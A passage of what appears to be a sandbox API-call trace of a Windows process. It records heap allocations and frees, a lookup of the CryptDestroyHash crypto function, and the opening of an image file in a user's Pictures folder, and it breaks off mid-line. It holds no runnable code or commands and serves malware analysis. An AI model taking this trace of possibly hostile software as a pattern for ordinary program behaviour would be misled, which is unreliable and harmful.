RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0088.785] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0088.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0088.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0088.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0088.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0088.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0088.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0088.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0088.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0088.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0088.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0088.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0088.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0088.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796e08 [0088.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0088.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0088.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0088.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0088.786] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0088.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0088.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0088.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0088.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0088.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0088.786] CryptDestroyHash (hHash=0x41ac000) returned 1 [0088.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0088.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0088.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0088.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0088.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0088.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0088.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0088.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0088.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0088.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0088.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0088.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0088.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0088.788] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0088.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0088.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0088.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0088.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0088.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0088.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0088.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0088.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0088.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0088.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0088.791] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0088.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0088.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0088.791] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0088.791] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0088.791] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0088.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0088.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0088.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0088.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0088.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0088.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0088.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0088.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0088.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0088.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0088.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0088.792] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\i5q_5Bq6.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\i5q_5bq6.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0088.792] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.792] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0088.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0088.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0088.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0088.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0088.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0088.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0088.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0088.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.792] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0088.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0088.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0088.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0088.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0088.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0088.793] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0088.793] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0088.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0088.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0088.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0088.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0088.793] RtlAllocateHeap 